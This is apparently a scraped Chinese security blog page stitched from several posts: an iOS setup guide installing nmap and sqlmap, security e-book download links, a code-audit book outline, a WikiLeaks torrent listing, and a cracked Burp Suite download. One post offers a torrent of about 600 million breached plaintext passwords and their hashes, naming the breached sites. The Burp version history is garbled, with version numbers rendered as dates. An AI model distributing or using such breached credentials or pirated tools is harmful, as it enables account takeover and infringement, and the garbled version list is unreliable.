apk upgrade                   升级软件包
apk list [--installed]        列出所有(或已安装)的软件包信息
apk del <package>             删除软件包
chmod                         修改文件权限
chown                         修改文件归属
...

0x03 打造iOS渗透神器

1、更新源:

apk update
apk upgrade

2、安装nmap

apk add nmap
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.

很方便,完成后在iphone手机上出现熟悉界面:

需要注意的是,在安装过程中,iphone或者ipad不能锁屏,需要在设置->显示与亮度->自动锁定 设置为为永不锁定,否则会安装失败报错。

3、安装sqlmap

首先安装运行sqlmap所需要的包python2,以及clone GitHub包的git包

apk add python2 git
git clone https://github.com/sqlmapproject/sqlmap
Image may be NSFW.
Clik here to view.

时间略长,完成后在ipad上出现熟悉界面:

其他

Image may be NSFW.
Clik here to view.

如果对手机的键盘不太适应,可以搭配购买便携式的蓝牙键盘,操作起来更加顺手,携带也很方便,可以说是一机在手,天下我有~

说明,本教程文章仅限用于学习和研究目的,请勿用于非法用途。

from

手机打造成渗透利器这个前有Kali Linux NetHunter for Nexus and OnePlus
地址:https://www.kali.org/kali-linux-nethunter/
后有: andrax pentest 高级专业黑客安卓渗透测试工具
总的来说作用不大——字体看不清,手机效率低,输入不方便

信息安全书籍推荐-京东SRC漏洞挖掘

安全应急响应中心之威胁情报探索,XSS之攻击与防御,CSRF的攻击与防御,上传漏洞,暴力破解,内网渗透,短信验证码安全,app手工安全检测,SSRF漏洞,支付逻辑漏洞,验证码的安全隐患,未授权访问漏洞,勒索软件解析,GitHub信息泄露,越权漏洞挖掘,JAVA反序列化漏洞,XXE漏洞,缓冲区溢出,URL跳转漏洞

信息安全书籍推荐-京东SRC漏洞挖掘
下载地址:
github.com/xiangpasama/JDSRC.zip
https://share.weiyun.com/5nkJ1Xf
书籍更新地址:
github.com/xiangpasama/JDSRC-Small-Classroom
书籍一览

02-安全应急响应中心之威胁情报探索.pdf
03-论安全漏洞响应机制扩展.pdf
04-企业级未授权访问漏洞防御实践.pdf
05-浅谈企业SQL注入漏洞的危害与防御.pdf
06-信息泄露之配置不当.pdf
07-XSS之攻击与防御.pdf
08-电商和O2O行业诈骗那些事儿(上).pdf
09-电商和O2O行业诈骗那些事儿(下).pdf
10-CSRF的攻击与防御.pdf
11-账户体系安全管理探讨.pdf
12-远程代码执行漏洞的探讨.pdf
13-服务器安全管控的探讨.pdf
14-畅谈端口安全配置.pdf
15-谈一谈github泄露.pdf
16-撞库攻击是场持久战.pdf
17-url重定向攻击的探讨.pdf
18-聊聊弱口令的危害(一).pdf
19-聊聊弱口令的危害(二).pdf
20-聊聊XML注入攻击.pdf
21-聊聊暴力破解.pdf
22-谈谈上传漏洞.pdf
23-浅谈内网渗透.pdf
24-聊聊短信验证码安全.pdf
25-深聊waf那些事儿(一).pdf
26-深聊waf那些事儿(二).pdf
27-聊聊app手工安全检测.pdf
28-APP安全加固技术的讨论.pdf
29-SSL安全问题及漏洞.pdf
30-谈谈DNS安全问题.pdf
31-浅谈SSRF漏洞.pdf
32-DNS解析故障的那些事儿.pdf
33-零基础如何挖漏洞.pdf
34-聊聊金融反欺诈那些事儿.pdf
35-密码找回逻辑漏洞小总结.pdf
36-交易支付逻辑漏洞小总结.pdf
37-越权漏洞泄露你的隐私.pdf
38-另一角度看越权漏洞.pdf
39-聊一聊服务器的安全基线.pdf
40-智能设备安全畅谈.pdf
41-谈一谈java代码审计.pdf
42-详解XPath注入.pdf
44-在线验证码的安全隐患.pdf
45-域名爆破的原理与工具.pdf
46-Redis 未授权访问漏洞.pdf
48-网站安全检测常用工具简介.pdf
49-网站安全检测之信息收集类工具.pdf
50-分布式扫描器的实现思路.pdf
51-Struts2漏洞原理讲解.pdf
52-详谈webshell检测.pdf
53-智能硬件漏洞挖掘入门指导.pdf
54-汽车的网络安全问题.pdf
56-二次注入漏洞解析.pdf
57-白帽子漏洞挖掘指导.pdf
58-勒索软件解析(一).pdf
59-勒索软件解析(二).pdf
60-解读网络安全法.pdf
61-如何对抗伪基站.pdf
62-黑色键盘的白帽子之路.pdf
64-移动端设备指纹.pdf
65-日志审计与网络安全.pdf
66-Mr.Chou的白帽子之路.pdf
68-安全运维的那些事.pdf
69-企业安全基础框架.pdf
70-Chora的白帽子之路.pdf
71-大数据安全(一).pdf
72-GitHub信息泄露.pdf
73-白盒安全测试.pdf
74-NFC支付安全.pdf
76-钓鱼网站攻击与防御.pdf
77-聊聊越权的那些事.pdf
78-大数据安全(二).pdf
79-威胁情报.pdf
80-Sven的白帽子之路.pdf
81-APP手势密码安全.pdf
82-移动安全之APP加固.pdf
83-v清风的白帽子之路.pdf
84-APT攻击与防御.pdf
85-web攻击溯源.pdf
86-web漏洞挖掘之SQL注入.pdf
87-web漏洞挖掘之前期信息收集.pdf
88-漏洞挖掘之服务器漏洞挖掘.pdf
89-web漏洞之逻辑漏洞挖掘.pdf
90-局外人的白帽子之路.pdf
91-web漏洞之敏感信息漏洞挖掘.pdf
92-web漏洞之CSRF漏洞挖掘.pdf
93-Alice的白帽子之路.pdf
94-web漏洞之越权漏洞挖掘.pdf
95-web漏洞之XSS漏洞挖掘.pdf
96-web漏洞挖掘之上传漏洞.pdf
97-web漏洞挖掘之业务逻辑漏洞.pdf
98-mmmark的白帽子之路.pdf
99-web漏洞挖掘之未授权访问漏洞.pdf
101-web漏洞挖掘之任意文件读取漏洞.pdf
102-web漏洞挖掘之任意命令执行漏洞.pdf
103-web漏洞挖掘之JAVA反序列化漏洞.pdf
104-web漏洞挖掘之SSRF漏洞.pdf
105-web漏洞挖掘之XXE漏洞.pdf
106-web漏洞挖掘之点击劫持漏洞.pdf
107-内网渗透工具分享.pdf
108-web安全日志分析.pdf
109-攻击溯源.pdf
110-网络取证技术.pdf
111-网络安全等级保护.pdf
112安全日志分析系统建设.pdf
113-二次注入漏洞挖掘.pdf
114-Vulkey_Chen的白帽子之路.pdf
115-聊聊CTF比赛.pdf
116-Nodejs安全.pdf
117-关于fuzz的一些简单思考.pdf
118-IOT漏洞挖掘之路由器.pdf
119-渗透测试之几个拦截行为bypass.pdf
120-国内SRC漏洞挖掘经验和自用技巧.pdf
121-URL注入攻击.pdf
122-DOM-XSS漏洞挖掘.pdf
123-富文本存储型XSS漏洞挖掘.pdf
124-Reckfulyx的白帽子之路.pdf
125-业务逻辑漏洞挖掘.pdf
126-黑盒测试缓冲区溢出.pdf
127-威胁情报的不同玩法.pdf
128-甲方威胁情报生存指南.pdf
129-企业安全建设思考.pdf
130-ch1st的白帽子之路.pdf
131-越权漏洞的挖掘.pdf
132-代码审计&黑白盒测试.pdf
133-基于代码路径的漏洞挖掘.pdf
134-浅谈URL跳转漏洞的挖掘与防御.pdf
135-RedTeam攻击技巧和安全防御.pdf
136-浅谈Java原生反序列化漏洞.pdf
137-浅谈内网渗透中的Window认证.pdf
138-浅谈电子邮件安全.pdf
139-APP安全之四大组件漏洞.pdf
140-浅谈IoT系统的攻击与防御.pdf

6亿md5密文分享 md5查询必备数据库

6亿md5密文分享 md5查询必备数据库 干货分享
下载地址:torrent

该文件中包含6亿个独特的纯文本密码,这些密码是从截至2018年夏季的大约10年来最大的100个数据库转储中收集的。我根据这些密码生成了NTLM、SHA1、SHA256、MySQL和MD5 hashes,这些密码包含在下载中包含的文件中。据估计,密码总数最初超过20亿。
在2018年初,我开始收集我能发现的最大数据泄露的数据转储。应该注意的是,我自己没有参与任何实际的违规行为。我刚刚从如下的转储中收集了数据:在单个数据库中发现14亿个明文凭证

然后我开始从其他地方收集它们,比如https://hashes.org/,下载超过100万个可用的纯文本密码的转储文件。在下载完所有密码并将它们导入数据库之后,我将所有唯一的密码选择到一个表中。然后,我花了几个星期的时间生成下载中找到的散列值。

这些数据来源于以下网站以前泄露的密码:

000webhost
1394store.com
178
17media
7k7k
8tracks.com
99fame.com
aipai.com
Alancristea
animoto.com
armorgames.com
ashleymadison.com
Avvo.com
badoo
Balancek
Barbeligh
BitcoinLixter
Blankmediagames.com
bleachforum
breachcompilation
burnett
cfire.mail.ru
CSGameServs.com
ddo.com
Delicious Takoyaki
disqus
DLH.net
dropbox
dubsmash.com
edmodo.com
eharmony
eighttracks
estantevirtual.com.br
evony
eyeem.com
fotolog.com
Gamerzplanet.net
game-tuts.com
Gamevn.com
gamigo
gfan
gmail
Gpotato.com
graboid
have i been pwnd v1
have I been pwnd v2
have I been pwnd v3
have I been pwnd v4
heroes of newerth
hiapk.com
houzz.com
id-zing-vn
imesh
Ixigo.com
kaixin
lastfm
lbsg.net
lifebear.com
linkedin
LotRO.com
LulzSecDelivers
matel
megatron
minecraft
mpgh.net
Muzhiwan.com
myfitnesspal.com
myheritage.com
myspace
neopets
nexusmods.com
Nihonomaru
Nulledio
Parapa.mail.ru
paypal
r2games
rambler
readnovel.com
redbox
RuneScape2015
Shadi.com
shein.com
Strongholdkingdoms.com
Subagames.com
surgeryu.com
taobao
taringa
tgbus.com
tianya
twitter
weheartit.com
xiaomi
xsplit
yahoo
yahoo voices
youku
youporn
zomato
zoosk

6亿md5密文分享 md5查询必备数据库
下载地址:torrent

代码审计企业级Web代码安全架构(中文版)

代码审计企业级Web代码安全架构(中文版)
下载地址: pan.baidu.com/s/1dFC7RN4KyQfqWTjAzFUG-w 
提取码:n4y6

Image may be NSFW.
Clik here to view.
代码审计企业级Web代码安全架构(中文版)

目录 · · · · · ·
代码审计:企业级web代码安全架构 I
前言 IV
导读 VI
致谢和感言 IX
目录 XI
第1章 代码审计环境搭建
1.1 wamp/wnmp环境搭建
1.2 lamp/lnmp环境搭建
1.3 PHP核心配置详解
第2章 审计辅助与漏洞验证工具
2.1 代码编辑器
2.1.1 notepad++
2.1.2 UltraEdit
2.1.3 Zend Studio
2.2 代码审计工具
2.2.1 Seay源码审计系统
2.2.2 Fortify SCA
2.2.3 RIPS
2.3 漏洞验证辅助
2.3.1 burp suite
2.3.2 浏览器扩展
2.3.3 编码转换及加解密工具
2.3.4 正则调试工具
2.3.5 SQL执行监控工具
第3章 通用代码审计思路
3.1 敏感函数回溯参数过程
3.1.1 espcms注入挖掘案例
3.2 通读全文代码
3.2.1 骑士cms通读审计案例
3.2.1.1 查看应用文件结构
3.2.1.2 查看关键文件代码
3.2.1.3 查看配置文件
3.2.1.4 跟读首页文件
3.3 根据功能点定向审计
3.3.1 Bugfree重装漏洞案例
第4章 漏洞挖掘与防范(基础篇)
4.1 SQL注入漏洞
4.1.1 挖掘经验
4.1.1.1 普通注入
4.1.1.2 编码注入
4.1.1.2.1 宽字节注入
4.1.1.2.2 二次urldecode注入
4.1.1.3 espcms搜索注入分析
4.1.2 漏洞防范
4.1.2.1 gpc/rutime魔术引号
4.1.2.2 过滤函数和类
4.1.2.2.1 addslashes函数
4.1.2.2.2 mysql_[real_]escape_string函数
4.1.2.2.3 intval等字符转换
4.1.2.3 PDO prepare预编译
4.2 XSS漏洞
4.2.1 挖掘经验
4.2.1.1 反射型XSS
4.2.1.2 存储型XSS
4.2.1.3 骑士CMS 存储型XSS分析
4.2.2 漏洞防范
4.2.2.1 特殊字符HTML实体转码
4.2.2.2 标签事件属性黑白名单
4.3 CSRF漏洞
4.3.1 挖掘经验
4.3.1.1 Discuz csrf备份拖库分析
4.3.2 漏洞防范
4.3.2.1 Token验证
4.3.2.2 验证码验证
第5章 漏洞挖掘与防范(进阶篇)
5.1 文件操作漏洞
5.1.1 文件包含漏洞
5.1.1.1 挖掘经验
5.1.1.2 本地文件包含
5.1.1.2.1 远程文件包含
5.1.1.2.2 文件包含截断
5.1.1.2.3 Metinfo文件包含漏洞分析
5.1.2 文件读取(下载)漏洞
5.1.2.1 挖掘经验
5.1.2.1.1 phpcms任意文件读取分析
5.1.3 文件上传漏洞
5.1.3.1 挖掘经验
5.1.3.1.1 未过滤或本地过滤
5.1.3.1.2 黑名单扩展名过滤
5.1.3.1.3 文件头、content-type验证绕过
5.1.3.1.4 phpcms任意文件上传分析
5.1.4 文件删除漏洞
5.1.4.1 挖掘经验
5.1.4.1.1 Metinfo任意文件删除分析
5.1.5 文件操作漏洞防范
5.1.5.1 通用文件操作防御
5.1.5.2 文件上传漏洞防范
5.2 代码执行漏洞
5.2.1 挖掘经验
5.2.1.1 代码执行函数
5.2.1.1.1 eval和assert函数
5.2.1.1.2 preg_replace函数
5.2.1.1.3 调用函数过滤不严
5.2.1.2 动态函数执行
5.2.1.3 Thinkphp代码执行漏洞分析
5.2.2 漏洞防范
5.3 命令执行漏洞
5.3.1 挖掘经验
5.3.1.1 命令执行函数
5.3.1.2 反引号命令执行
5.3.1.3 亿邮命令执行漏洞分析
5.3.2 漏洞防范
5.3.2.1 命令防注入函数
5.3.2.2 参数白名单
第6章 漏洞挖掘与防范(深入篇)
6.1 变量覆盖漏洞
6.1.1 挖掘经验
6.1.1.1 函数使用不当
6.1.1.1.1 extract函数
6.1.1.1.2 parse_str函数
6.1.1.1.3 import_request_variables函数
6.1.1.2 $$变量覆盖
6.1.1.3 Metinfo变量覆盖漏洞分析
6.1.2 漏洞防范
6.1.2.1 使用原始变量
6.1.2.2 验证变量存在
6.2 逻辑处理漏洞
6.2.1 挖掘经验
6.2.1.1 等于与存在判断绕过
6.2.1.1.1 in_array函数
6.2.1.1.2 is_numeric函数
6.2.1.1.3 双等于和三等于
6.2.1.2 账户体系中的越权漏洞
6.2.1.3 未exit或return引发的安全问题
6.2.1.4 常见支付漏洞
6.2.1.5 Ecshop逻辑错误注入分析
6.2.2 漏洞防范
6.3 会话认证漏洞
6.3.1 挖掘经验
6.3.1.1 Cookie认证安全
6.3.1.2 Espcms任意用户登录分析
6.3.2 漏洞防范
第7章 二次漏洞审计
7.1 什么是二次漏洞
7.2 二次漏洞审计技巧
7.3 dedecms二次注入漏洞分析
第8章 代码审计小技巧
8.1 钻GPC等转义的空子
8.1.1 不受GPC保护的全局变量
8.1.2 编码转换问题
8.2 神奇的字符串
8.2.1 字符处理函数报错信息泄露
8.2.2 字符串截断
8.2.2.1 %00空字符截断
8.2.2.2 iconv函数字符编码转换截断
8.3 php:// 输入输出流
8.4 PHP代码解析标签
8.5 FUZZ漏洞发现
8.6 不严谨的正则表达式
8.7 十余种MySQL报错注入
8.8 Windows FindFirstFile利用
8.9 PHP可变变量
第9章 参数的安全过滤
9.1 第三方过滤函数与类
9.1.1 discuz SQL安全过滤类分析
9.1.2 discuz xss标签过滤函数分析
9.2 内置过滤函数
第10章 使用安全的加密算法
10.1 对称加密
10.1.1 3DES加密
10.1.2 AES加密
10.2 非对称加密
10.2.1 RSA加密
10.3 单向加密
10.3.1 md5/sha1加密
第11章 业务功能安全设计
11.1 验证码
11.1.1 验证码绕过
11.1.2 验证码资源滥用
11.2 用户登录
11.2.1 撞库漏洞
11.2.2 API登录
11.3 用户注册
11.4 密码找回
11.5 资料查看与修改
11.6 投票/积分/抽奖
11.7 充值支付
11.8 私信及反馈
11.9 远程地址访问
11.10 文件管理
11.11 数据库管理
11.12 命令/代码执行
11.13 文件/数据库备份
11.14 API接口
第12章 应用安全体系建设
12.1 用户密码安全策略
12.2 前后台用户分表
12.3 后台地址隐藏
12.4 密码加密存储方式
12.5 登入限制
12.6 API站库分离
12.7 慎用第三方服务
12.8 严格的权限控制
12.9 敏感操作多因素验证
12.10 应用自身的安全中心

代码审计企业级Web代码安全架构(中文版)
下载地址: pan.baidu.com/s/1dFC7RN4KyQfqWTjAzFUG-w 
提取码:n4y6

维基解密47941份torrent文件

维基解密47941份torrent文件
下载地址:https://github.com/ddosi/hack
解压密码:www.ddosi.com

Image may be NSFW.
Clik here to view.
维基解密47941份torrent文件

详细目录文件查看地址:raw.githubusercontent.com/ddosi/hack
部分目录文件如下:

├─tibet-protests-avi
│      BBC_-_Dalai_Lama_interview_on_Tibet_protests_2008.03.16.avi.torrent
│      BBC_-_Deaths_Reported_in_Tibet_Protests.avi.torrent
│      BBC_-_Lhasa_Tibetan_Demanded_independent_from_China_rule.avi.torrent
│      BBC_-_The_world_condemn_China_killed_Tibet_Protesters.avi.torrent
│      BBC_F2_ABC_-_Protests_in_Tibet_Lhasa_against_China.avi.torrent
│      British_TV_-_Document_Tibet_Protest_for_Independent_Lhasa.avi.torrent
│      Brussels_Belgium_Tibet_Protest_against_China.avi.torrent
│      Calgary_Canada_Tibet_Protest_against_China.avi.torrent
│      CNN_-_Bejing_Blind_the_world_on_Tibet-Kick_Foreign_out_of_Lhasa.avi.torrent
│      CNN_-_Protest_in_Tibet.avi.torrent
│      CNN_-_Protest_in_Tibet_and_India_Against_China.avi.torrent
│      CNN_World_-_Activists_report_clashes.avi.torrent
│      CNN_World_-_Tibet_Chinas_media_blackout.avi.torrent
│      CNN_World_-_Tibet_Chinas_problem.avi.torrent
│      CNN_World_-_Tibet_Chinese_security_in_Lhasa.avi.torrent
│      CNN_World_-_Tibet_Exiles_arrested.avi.torrent
│      CNN_World_-_Tibet_Free_Tibet_Movement.avi.torrent
│      CNN_World_-_Tibet_Hunger_strike_in_India.avi.torrent
│      CNN_World_-_Tibet_Marchers_stopped.avi.torrent
│      CNN_World_-_Tibet_Olympics_tied_to_protests.avi.torrent
│      CNN_World_-_Tibet_Protests_continue.avi.torrent
│      CNN_World_-_Tibet_Protests_in_India.avi.torrent
│      CNN_World_-_Tibet_Protest_quashed.avi.torrent
│      CNN_World_-_Tibet_Refugees_jailed.avi.torrent
│      CNN_World_-_Tibet_Richard_Gere_speaks.avi.torrent
│      CNN_World_-_Tibet_Riot_breaks_out.avi.torrent
│      France_24_-_Greatest_Embarrassment_Beijing_Olympics.avi.torrent
│      index.html.torrent
│      Interview_with_tourists.avi.torrent
│      Journeyman.tv_-_Tibet_Protests_grow.avi.torrent
│      Netherland_TV_-_Protests_in_Tibet.avi.torrent
│      Protest_in_Eastern_Tibet.avi.torrent
│      Sky_News_-_Dalai_Lama_called_for_investigation_in_Tibet_Protests.avi.torrent
│      Tibet_Lhasa_15-03-08.avi.torrent
│      Tibet_protest_in_Amdo_Labrang.avi.torrent
│      WIKILEAKS.TXT.torrent
│      Zurich_Switzerland_Tibet_Protests.avi.torrent
│      
├─tibet-protests-flash-video
│      BBC_-_Dalai_Lama_interview_on_Tibet_protests_2008.03.16.flv.torrent
│      BBC_-_Deaths_Reported_in_Tibet_Protests.flv.torrent
│      BBC_-_Lhasa_Tibetan_Demanded_independent_from_China_rule.flv.torrent
│      BBC_-_The_world_condemn_China_killed_Tibet_Protesters.flv.torrent
│      BBC_F2_ABC_-_Protests_in_Tibet_Lhasa_against_China.flv.torrent
│      British_TV_-_Document_Tibet_Protest_for_Independent_Lhasa.flv.torrent
│      Brussels_Belgium_Tibet_Protest_against_China.flv.torrent
│      Calgary_Canada_Tibet_Protest_against_China.flv.torrent
│      CNN_-_Bejing_Blind_the_world_on_Tibet-Kick_Foreign_out_of_Lhasa.flv.torrent
│      CNN_-_Protest_in_Tibet.flv.torrent
│      CNN_-_Protest_in_Tibet_and_India_Against_China.flv.torrent
│      CNN_World_-_Activists_report_clashes.flv.torrent
│      CNN_World_-_Tibet_Chinas_media_blackout.flv.torrent
│      CNN_World_-_Tibet_Chinas_problem.flv.torrent
│      CNN_World_-_Tibet_Chinese_security_in_Lhasa.flv.torrent
│      CNN_World_-_Tibet_Exiles_arrested.flv.torrent
│      CNN_World_-_Tibet_Free_Tibet_Movement.flv.torrent
│      CNN_World_-_Tibet_Hunger_strike_in_India.flv.torrent
│      CNN_World_-_Tibet_Marchers_stopped.flv.torrent
│      CNN_World_-_Tibet_Olympics_tied_to_protests.flv.torrent
│      CNN_World_-_Tibet_Protests_continue.flv.torrent
│      CNN_World_-_Tibet_Protests_in_India.flv.torrent
│      CNN_World_-_Tibet_Protest_quashed.flv.torrent
│      CNN_World_-_Tibet_Refugees_jailed.flv.torrent
│      CNN_World_-_Tibet_Richard_Gere_speaks.flv.torrent
│      CNN_World_-_Tibet_Riot_breaks_out.flv.torrent
│      France_24_-_Greatest_Embarrassment_Beijing_Olympics.flv.torrent
│      index.html.torrent
│      Interview_with_tourists.flv.torrent
│      Journeyman.tv_-_Tibet_Protests_grow.flv.torrent
│      mediaplayer.swf.torrent
│      Netherland_TV_-_Protests_in_Tibet.flv.torrent
│      Protest_in_Eastern_Tibet.flv.torrent
│      Sky_News_-_Dalai_Lama_called_for_investigation_in_Tibet_Protests.flv.torrent
│      swfobject.js.torrent
│      Tibet_Lhasa_15-03-08.flv.torrent
│      Tibet_protest_in_Amdo_Labrang.flv.torrent
│      WIKILEAKS.TXT.torrent
│      Zurich_Switzerland_Tibet_Protests.flv.torrent
│      
├─tollcollect
│      tc-urk-reg-108-a-2002.pdf.torrent
│      tc-urk-reg-108-aa-2002.pdf.torrent
│      tc-urk-reg-108-b-2002.pdf.torrent
│      tc-urk-reg-108-bb-2002.pdf.torrent
│      tc-urk-reg-108-c-2002.pdf.torrent
│      tc-urk-reg-108-cc-2002.pdf.torrent
│      tc-urk-reg-108-d-2002.pdf.torrent
│      tc-urk-reg-108-dd-2002.pdf.torrent
│      tc-urk-reg-108-e-2002.pdf.torrent
│      tc-urk-reg-108-ee-2002.pdf.torrent
│      tc-urk-reg-108-f-2002.pdf.torrent
│      tc-urk-reg-108-ff-2002.pdf.torrent
│      tc-urk-reg-108-g-2002.pdf.torrent
│      tc-urk-reg-108-gg-2002.pdf.torrent
│      tc-urk-reg-108-h-2002.pdf.torrent
│      tc-urk-reg-108-hh-2002.pdf.torrent
│      tc-urk-reg-108-z-2002.pdf.torrent
│      tc-urk-reg-109-2002.pdf.torrent
│      toll-collect-appendices-2002.txt.torrent
│      toll-collect-appendices-2002.zip.torrent
│      
├─tz-foreign-investors
│      Bounced_Cheque_Allegations.pdf.torrent
│      Document_1._Ex-parte_Interim_Order-1.pdf.torrent
│      Document_2_Ex-parte_interim_order-second_one-1.pdf.torrent
│      Document_4b-Certificate_of_Urgency-1.pdf.torrent
│      Document_4e._Power_of_Attorney.pdf.torrent
│      Forgery_Allegations.pdf.torrent
│      Letter_to_Vincent_Lyimo_stating_that_the_court_order_is_legaly_defective_and_obtained_by_fraud.pdf.torrent
│      Prison_Cage.JPG.torrent
│      Scanned_copy_of_Land_Tribunal_Ruling.pdf.torrent
│      
├─un-kosovo-pristina
│      OIOS-20041213-01.pdf.torrent
│      OIOS-20041217-01.pdf.torrent
│      OIOS-20050000-01.pdf.torrent
│      OIOS-20050000-02.pdf.torrent
│      OIOS-20050000-11.pdf.torrent
│      OIOS-20050000-12.pdf.torrent
│      OIOS-20050114-01.pdf.torrent
│      OIOS-20050228-01.pdf.torrent
│      OIOS-20070728-01.pdf.torrent
│      
├─un-oios
│      OIOS-20040000-01.pdf.torrent
│      OIOS-20040000-02.pdf.torrent
│      OIOS-20040000-03.pdf.torrent
│      OIOS-20040000-04.pdf.torrent
│      OIOS-20041015-01.pdf.torrent
│      OIOS-20041026-01.pdf.torrent
│      OIOS-20041027-01.pdf.torrent
│      OIOS-20041101-01.pdf.torrent
│      OIOS-20080819-01.pdf.torrent
│      OIOS-20080822-01.pdf.torrent
│      OIOS-20080825-01.pdf.torrent
│      OIOS-20080826-01.pdf.torrent
│      OIOS-20080829-01.pdf.torrent
│      OIOS-20080903-01.pdf.torrent
│      OIOS-20080903-02.pdf.torrent
│      OIOS-20080908-01.pdf.torrent
│      OIOS-20080910-01.pdf.torrent
│      OIOS-20080918-04.pdf.torrent
│      OIOS-20080918-05.pdf.torrent
│      OIOS-20080922-01.pdf.torrent
│      OIOS-20080922-02.pdf.torrent
│      OIOS-20080923-01.pdf.torrent
│      OIOS-20080925-01.pdf.torrent
│      
├─us-catholic-hospitals-2008
│      Catholic-Hospitals.pdf.torrent
│      Distribution-Memo.pdf.torrent
│      Review-Data-Summary.pdf.torrent
│      Review-Narrative.pdf.torrent
│      TCH-Health-Systems.pdf.torrent
│      TCH-Hospitals.pdf.torrent
│      TCH-Introduction.pdf.torrent
│      TCH-Methodology.pdf.torrent
│      TCH-Patients.pdf.torrent
│      TCH-Procedure-Codes.pdf.torrent
│      TCH.xls.torrent
│      
├─us-fema-winter-storm-community-relations-2009
│      Community_Relations_Field_Reports.pdf.torrent
│      FEMA_Tribal_Report_Snoqualmie.pdf.torrent
│      IOF_Fact_Sheet_Jan_2009.pdf.torrent
│      Morton_Meeting_Plans.pdf.torrent
│      
├─www.armagedon.org.il
│  │  about_us.htm.torrent
│  │  beer_yaakov.htm.torrent
│  │  books.htm.torrent
│  │  css.css.torrent
│  │  favicon.ico.torrent
│  │  images.torrent
│  │  index.htm.torrent
│  │  malmab.htm.torrent
│  │  soreq.htm.torrent
│  │  submarines.htm.torrent
│  │  text.css.torrent
│  │  vanunu.htm.torrent
│  │  what_do_we_want.htm.torrent
│  │  
│  └─images
│          armagedon_logo.jpg.torrent
│          a_cohen1.jpg.torrent
│          a_cohen_en1.jpg.torrent
│          barnaby1.jpg.torrent
│          books.jpg.torrent
│          cliff_edge.jpg.torrent
│          demo1991.jpg.torrent
│          dolphin.jpg.torrent
│          dolphin1.jpg.torrent
│          free_nuke.jpg.torrent
│          hagada.jpg.torrent
│          hersh_en.jpg.torrent
│          hersh_he.jpg.torrent
│          icon_x.jpg.torrent
│          jerichoII.jpg.torrent
│          jericho_range.jpg.torrent
│          klingberg1.jpg.torrent
│          lesson.jpg.torrent
│          logo.jpg.torrent
│          malmab_logo1.jpg.torrent
│          map.jpg.torrent
│          missiles.jpg.torrent
│          nav_bar.jpg.torrent
│          opensecrets.jpg.torrent
│          rsa.jpg.torrent
│          soreq.jpg.torrent
│          soreq1.jpg.torrent
│          soreq2.jpg.torrent
│          soreq_accident.jpg.torrent
│          South_African_nuclear_bomb.jpg.torrent
│          sundaytimes.jpg.torrent
│          thesundaytimes.jpg.torrent
│          Thumbs.db.torrent
│          tubes.jpg.torrent
│          vanunu.jpg.torrent
│          vanunu1.jpg.torrent
│          vanunu_8.jpg.torrent
│          vanunu_9.jpg.torrent
│          word_logo.jpg.torrent
│          y_cohen_en1.jpg.torrent
│          y_cohen_he1.jpg.torrent
│          
└─www.armagedonz.org
    │  css.css.torrent
    │  images.torrent
    │  scenario.htm.torrent
    │  
    └─images
            armagedon_logo.jpg.torrent
            impact.jpg.torrent
            impact_s.jpg.torrent

维基解密47941份torrent文件
下载地址:https://github.com/ddosi/hack
解压密码:www.ddosi.com

burpsuite2.0.11破解版下载-burp破解版beta2.0.11

burpsuite2.0.11破解版下载-burp破解版beta2.0.11
下载地址: https://github.com/ddosi/hack

Image may be NSFW.
Clik here to view.
burpsuite2.0.11破解版下载-burp破解版beta2.0.11
Image may be NSFW.
Clik here to view.
burpsuite2.0.11破解版下载-burp破解版beta2.0.11

burp suite历年来发布版本如下:
看一下你用的版本和最新版本差多少.

burpsuite发布档案 更新内容

发布档案
▼  2019 (24)
▼  七月 (3)
专业/社区版2.1.02
企业版1.1.01
专业/社区版2.1.01
▼  六月 (6)
企业版1.1
专业/社区版2.1
专业2.0.25beta
企业版1.0.17beta
专业2.0.24beta
专业2.0.23beta
▼  五月 (3)
专业2.0.22beta
专业2.0.21beta
企业版1.0.16beta
▼  四月 (2)
企业版1.0.15beta
专业2.0.20beta
▼  三月 (3)
专业2.0.19beta
专业2.0.18beta
企业版1.0.14beta
▼  二月 (3)
专业2.0.17beta
专业2.0.16beta
企业版1.0.13beta
▼  一月 (4)
企业版1.0.12beta
专业2.0.15beta
专业2.0.14beta
企业版1.0.11beta
▼  2018 (32)
▼  十二月 (1)
企业版1.0.10beta
▼  十一月 (4)
专业2.0.13beta
企业版1.0.09beta
专业2.0.12beta
企业版1.0.08beta
▼  十月 (7)
专业2.0.11beta
专业2.0.10beta
企业版1.0.07beta
企业版1.0.06beta
专业2.0.09beta
专业2.0.08beta
企业版1.0.05beta
▼  九月 (7)
专业2.0.07beta
企业版1.0.04beta
专业2.0.06beta
企业版1.0.03beta
专业2.0.05beta
企业版1.0.02beta
专业2.0.04beta
▼  八月 (7)
企业版1.0.01beta
企业版1.0beta
2.0.03beta
2.0.02beta
2.0.01beta
2.0beta
37年7月1日
▼  七月 (1)
36年7月1日
▼  六月 (2)
35年7月1日
34年7月1日
▼  三月 (1)
33年7月1日
▼  二月 (1)
32年7月1日
▼  一月 (1)
31年7月1日
▼  2017 (15)
▼  十二月 (1)
30年7月1日
▼  十一月 (2)
29年7月1日
28年7月1日
▼  八月 (2)
27年7月1日
1.7.26
▼  七月 (2)
1.7.25
24年7月1日
▼  五月 (1)
23年7月1日
▼  四月 (3)
1.7.22
1.7.21
1.7.20
▼  三月 (1)
1.7.19
▼  二月 (2)
1.7.18
1.7.17
▼  一月 (1)
1.7.16
▼  2016 (23)
▼  十二月 (2)
1.7.15
1.7.14
▼  十一月 (4)
1.7.13
1.7.12
1.7.11
1.7.10
▼  十月 (2)
09年7月1日
08年7月1日
▼  九月 (2)
07年7月1日
06年7月1日
▼  八月 (1)
05年7月1日
▼  七月 (1)
04年7月1日
▼  五月 (1)
03年7月1日
▼  四月 (3)
1.7.02beta
1.7.01beta
1.7beta
▼  三月 (1)
39年6月1日
▼  二月 (2)
38年6月1日
1.6.37
▼  一月 (4)
36年6月1日
35年6月1日
34年6月1日
33年6月1日
▼  2015 (24)
▼  十二月 (2)
32年6月1日
31年6月1日
▼  十月 (3)
30年6月1日
29年6月1日
28年6月1日
▼  九月 (2)
27年6月1日
26年6月1日
▼  八月 (2)
25年6月1日
24年6月1日
▼  七月 (3)
23年6月1日
22年6月1日
21年6月1日
▼  六月 (2)
v1.6.20
v1.6.19
▼  五月 (1)
v1.6.18
▼  四月 (5)
v1.6.01免费版
v1.6.17
v1.6.16
v1.6.15
v1.6.14
▼  三月 (2)
v1.6.13
v1.6.12
▼  二月 (2)
v1.6.11
V1.6.10
▼  2014 (13)
▼  十一月 (3)
v1.6.09
v1.6.08
v1.6.07
▼  十月 (1)
